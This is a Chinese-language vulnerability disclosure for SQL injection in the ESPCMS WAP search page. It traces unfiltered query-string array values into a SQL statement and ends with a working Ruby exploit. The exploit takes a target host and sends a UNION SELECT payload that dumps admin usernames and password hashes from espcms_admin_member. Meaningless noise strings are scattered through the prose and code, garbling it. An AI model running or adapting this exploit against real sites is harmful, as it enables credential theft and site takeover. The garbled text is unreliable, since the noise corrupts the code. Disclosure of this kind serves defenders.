espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
3 i% V# {5 F5 o# n6 x0×2 PoC


, Q$ S0 L* ?' O. m! M0 Y* }) ^) x
0×0 漏洞概述
' g, U, H" N+ s+ v3 Q! x
8 @) {2 G( l, T# }. U易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
其在处理传入的参数时考虑不严谨导致SQL注入发生

* w3 u% _1 d1 w; p5 X
' J. _$ y! J" M" y" ~0×1 漏洞细节

6 i9 T+ S+ Z( Z0 V; t9 ]0 z! w变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
$ {( M& i3 }) g0 x& h7 q而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。

在/interface/3gwap_search.php文件的in_result函数中:


5 f* f3 P/ X7 Y' a
       function in_result() {
            ... ... ... ... ... ... ... ... ...
            $urlcode = $_SERVER[ 'QUERY_STRING '];
0 l# C( r5 ]$ g  X0 D            parse_str(html_entity_decode($urlcode), $output);

            ... ... ... ... ... ... ... ... ...
4 u6 k9 c: G5 d, ]' g& D            if (is_array($output['attr' ]) && count($output['attr']) > 0) {
6 ]4 n( f& ]6 K  H' R0 i. z
8 e0 D" [+ K: f                  $db_table = db_prefix . 'model_att';
8 U) j! Z* |) i& w4 ]# Y
# d# G; T6 X$ S8 |2 A0 S. x* k                   foreach ($output['attr' ] as $key => $value) {
- V% O7 s/ L  m7 ]  l                         if ($value) {

$ J0 o9 o' _! k5 G9 {4 F                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
/ L, G  M3 `4 U! `% R0 Z+ _                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
- ]+ L9 R/ `7 I: Q0 h! _                              $countnum = $this->db_numrows($db_table, $db_att_where);
9 S" G1 b- K1 {/ k. @4 V                               if ($countnum > 0) {
$ q2 K. K+ u$ e% ^/ T9 R                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
) q0 [7 a" P- _6 r& {# I                              }
# B" S# |3 E! o3 B, y* m                        }
                  }
+ T: H2 N) o! v8 ~! U2 n            }
+ u, h# ~% q- G9 N2 d            if (!empty ($keyword) && empty($keyname)) {
! ]+ N! g- c. ]- V$ K1 T; [8 c                  $keyname = 'title';
                  $db_where.= " AND a.title like '%$keyword%'" ;
            } elseif (!empty ($keyword) && !empty($keyname)) {
                  $db_where.= " AND $keyname like '% $keyword%'";
            }
1 ^3 v; s. u# |; T, z  R2 k* y; Z  u5 Q            $pagemax = 15;

% d0 u7 ]  a% D            $pagesylte = 1;

/ S# X4 K! f& {! l0 V             if ($countnum > 0) {
' i' m& F1 ?0 o* O! |0 K. x
                  $numpage = ceil($countnum / $pagemax);
. H: T3 z, }! Z, ]: o! \            } else {
; P* A! u  ^7 h2 H& ^0 G3 x                  $numpage = 1;
            }
. `0 I/ D6 t/ g( o7 K            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
            ... ... ... ... ... ... ... ... ...
      }
  ], }& I4 i5 X, R  q" R/ A7 J

* u- m+ Z4 P3 Y1 W( H0×2 PoC
+ e& i" h2 S# I8 f9 o( A" ^, Y
' c3 d' B# z6 Z

require "net/http"
: e' _$ B" H' `; p
, U$ [9 k2 S) I" F9 P0 j: odef request(method, url)
    if method.eql?("get")
        uri = URI.parse(url)
- F& q3 Z) a5 f        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
/ l2 s$ Q6 d+ e! i        return response
0 s9 }6 B' w" \4 K& b    end
" P4 x2 E4 H" r5 R4 {) Jend

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
/ k0 K+ z$ q. g9 D% i' lAuthor:ztz
8 x3 I! v0 Z4 V2 k5 Q: K; jBlog:http://ztz.fuzzexp.org/
-------------------------------------------------------

; V- |5 Q( Z$ eHERE
/ I7 g5 w5 ]/ D" P
usage =<<HERE
Usage:         ruby #{$0} host port path
  U( Z% F  x- e  [; b- L" Eexample:     ruby #{$0} www.target.com 80 /
" d9 }. c  t$ UHERE

/ q% w; \+ r5 H7 F9 `. uputs doc
4 i4 \! c: }2 jif ARGV.length < 3
    puts usage
" h, |+ `- `4 ]" h. q' O. celse
    $host = ARGV[0]
( E5 D/ `( u% S3 o& @    $port = ARGV[1]
    $path = ARGV[2]
/ I/ b5 c* _0 [* l
+ O( r6 A$ E) {6 C' I' t3 q, {    puts "

send request..."
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
    response = request("get", url)
    result = response.body.scan(/\w+&\w{32}/)
    puts result
end
, |: I, b/ }3 C0 r- j7 w